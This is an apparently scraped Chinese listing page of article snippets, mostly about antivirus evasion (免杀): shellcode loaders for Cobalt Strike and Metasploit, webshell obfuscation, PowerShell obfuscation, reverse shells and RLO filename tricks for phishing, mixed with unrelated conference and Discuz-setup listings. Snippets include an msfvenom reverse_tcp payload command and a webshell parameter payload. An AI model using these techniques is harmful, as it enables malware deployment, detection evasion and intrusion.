1. Toy模板网首页
  2. > 远控免杀论坛

远控免杀论坛

  • 78 Python开发-多线程Fuzz&Waf异或免杀&爆破

    78 Python开发-多线程Fuzz&Waf异或免杀&爆破

    协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术 掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等 Python开发-简单多线程技术实现脚本 queue,threading模块使用 Python开发-利用FTP模块实现协议爆破脚本 1.ftplib模块使用 2.遍历

    2024年02月03日
    阅读 54
  • php_webshell免杀--从0改造你的AntSword

    php_webshell免杀--从0改造你的AntSword

    为什么会有改造蚁剑的想法,之前看到有做冰蝎的流量加密,来看到绕过waf,改造一些弱特征,通过流量转换,跳过密钥交互。 但是,冰蝎需要反编译去改造源码,再进行修复bug,也比较复杂。而AntSword相对于冰蝎来说,不限制webshell,即一句话也可以进行连接,还可以自定

    2024年02月11日
    阅读 46
  • ConsoleApplication818项目免杀(CreateThreadpoolWait+VEH Hook Load)

    ConsoleApplication818项目免杀(CreateThreadpoolWait+VEH Hook Load)

    效果 可以看到成功上线 这个先不做免杀,之后补充

    2024年02月10日
    阅读 49
  • PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)

    PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)

    Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-Obfuscation Invoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。Invoke-Obfuscation还有多个选

    2024年01月30日
    阅读 41

  • WAF攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参

    webshell检测平台 https://scanner.baidu.com/#/pages/intro https://ti.aliyun.com/#/webshell 对比工具代码-菜刀蚁剑冰蝎哥斯拉等 对比WAF规则-函数匹配工具指纹等 1.php 传参带入 ?a=ass x=cGhwaW5mbygpOw== 2.php 变量覆盖 x=cGhwaW5mbygpOw== 3.php 加密变异 http://www.phpjm.net/ 4.php 异或运算 5.php 脚本生成器 Webshel

    2024年01月30日
    阅读 47
  • ConsoleApplication17_2项目免杀(Fiber+VEH Hook Load)

    ConsoleApplication17_2项目免杀(Fiber+VEH Hook Load)

    加载方式Fiber+VEH Hook Load Fiber是纤程免杀,VEH是异常报错,hook使用detours来hook VirtualAlloc和sleep,通过异常报错调用实现主动hook 纤程Fiber的概念:纤程是比线程的更小的一个运行单位。可以把一个线程拆分成多个纤程,然后通过人工转换纤程,从而让各个纤程工作。线程的实现

    2024年02月11日
    阅读 43
  • ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

    ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

    ShellCode_Loader - MsfCobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360火绒电脑管家Windows Defender(其他杀软未测试)。 该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络

    2024年02月04日
    阅读 54
  • 免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall

    免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall

    cs 上线 1. 生成 shellcode-c 或者 python 2. 打开 pycharm 工具,创建一个 py 文件,将原生态执行代码复制进去 shellcode 执行代码: 3.将生成的shellcode放到执行代码中,运行代码,cs成功上线 MSF 上线 1.执行命令,生成shellcode 命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129

    2024年02月09日
    阅读 52
  • 107-免杀对抗-C&C++&溯源ShellCode上线&混淆变异算法&回调编译执行

    107-免杀对抗-C&C++&溯源ShellCode上线&混淆变异算法&回调编译执行

    知识点 总结

    2024年02月16日
    阅读 75
  • 2、安全开发-Python-Socket编程&端口探针&域名爆破&反弹Shell&编码免杀

    2、安全开发-Python-Socket编程&端口探针&域名爆破&反弹Shell&编码免杀

    用途:个人学习笔记,欢迎指正! 目录 主要内容: 一、端口扫描(未开防火墙情况) 1、Python关键代码: 2、完整代码:多线程配合Queue进行全端口扫描 二、子域名扫描 三、客户端,服务端Socket编程通信cmd命令执行 1、客户端: 2、服务端: 四、python代码shellCode编码免杀后门上线

    2024年02月22日
    阅读 44
  • ChinaSoft 论坛巡礼 | 智慧化 IDE 论坛

    ChinaSoft 论坛巡礼 | 智慧化 IDE 论坛

    2023年CCF中国软件大会(CCF ChinaSoft 2023)由CCF主办,CCF系统软件专委会、形式化方法专委会、软件工程专委会以及复旦大学联合承办,将于 2023年12月1-3日 在 上海国际会议中心 举行。 本次大会主题是“ 智能化软件创新推动数字经济与社会发展 ”,学术、工业、教育、竞赛等

    2024年05月21日
    阅读 38
  • 【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑

    【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑

    经过免杀后的exe程序(xgpj.exe),进行重命名,在gpl位置插入Unicode控制字符,RLO(从左到右覆盖),如图 成功上线 后续修改图标,进行钓鱼伪装 演示环境:Winrar压缩软件 打包后进行RLO隐藏,主要是免杀问题 https://github.com/JohnHammond/msdt-follina 该漏洞首次发现在2022年5月27日,由白俄

    2024年02月13日
    阅读 40
  • ChinaSoft 论坛巡礼 | 开源软件生态健康度量论坛

    ChinaSoft 论坛巡礼 | 开源软件生态健康度量论坛

    2023年CCF中国软件大会(CCF ChinaSoft 2023)由CCF主办,CCF系统软件专委会、形式化方法专委会、软件工程专委会以及复旦大学联合承办,将于2023年12月1-3日在上海国际会议中心举行。 本次大会主题是“ 智能化软件创新推动数字经济与社会发展 ”,将举办学术、工业、教育、竞赛

    2024年02月08日
    阅读 41
  • COSCon'22 论坛集锦 1+16个论坛就等你了!

    COSCon'22 论坛集锦 1+16个论坛就等你了!

    COSCon\\\'22 开源社/KAIYUANSHE    业界具有广泛影响力的开源年度盛会 2022 第七届中国开源年会 (COSCon\\\'22) 将于 10 月 29 日 - 30 日在线上和线下同步拉开帷幕。 今年,我们的主题是: Open the World(打开新世界)! 线上大会共设有 1 个主论坛和 16 个分论坛,让我们一起来看看吧~ 01 论坛

    2024年02月21日
    阅读 31

  • 2021第六届杭州全球企业家论坛暨区块链高峰论坛

    2021第六届杭州全球企业家论坛暨区块链高峰论坛在今天火热开幕。来自高校、研究机构、企业等各领域的相关人士、专家云集现场,超5000人次参与,各行业近100家500强级别企业、上市企业出席或分享,影响力空前。 本次峰会由浙江省中小企业协会主办,中国建设银行杭州分

    2024年02月16日
    阅读 51
  • 第116天:免杀对抗-EDR&Syscall-hook&DLL反射注入&白加黑&隐写分离&加载器

    第116天:免杀对抗-EDR&Syscall-hook&DLL反射注入&白加黑&隐写分离&加载器

    知识点 演示案例: 总结

    2024年02月16日
    阅读 45
  • 第111天:免杀对抗-Java&ASM&汇编CS调用&内联C&MSF源码特征修改&Jar打包

    第111天:免杀对抗-Java&ASM&汇编CS调用&内联C&MSF源码特征修改&Jar打包

    知识点 演示案例

    2024年02月16日
    阅读 44
  • 轻松搭建Linux宝塔面板并实现公网访问Discuz论坛,让您的论坛更具吸引力

    轻松搭建Linux宝塔面板并实现公网访问Discuz论坛,让您的论坛更具吸引力

    Crossday Discuz! Board(以下简称 Discuz!)是一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的论坛服务。 下面我们在Linux上使用宝塔面板+Discuz+cpolar内网穿透工具结合,搭建

    2024年02月08日
    阅读 47
  • 论坛搭建.

    论坛搭建.

    目录 一.配置软件仓库 二.安装http php miriadb 三.配置数据库 四.源码拖拽并解压 五.防火墙通过 六.浏览器安装测试 七.界面参数设置 1.进入仓库目录 cd /etc/yum.repos.d  2.创建仓库文件 vim  local.repo 3.在 local.repo中写入:(粘贴的时候注意位置)   [biaoshi]                   仓库标识符

    2024年02月08日
    阅读 18
  • Linux搭建Discuz论坛

    Linux搭建Discuz论坛

    环境:redhat 9     mysql 8      Discuz 3.5 题目要求:在 bbs.example.com 主机上创建 Discuz 论坛,数据库服务器使用 db.example.com 主机的 bbs 数据库实例,该实例由 MySQL数据库软件提供服务。 题目要求没有说是在一台虚拟机上还是两台虚拟机上,这里我就在同一台虚拟机上进行实验。

    2024年02月12日
    阅读 60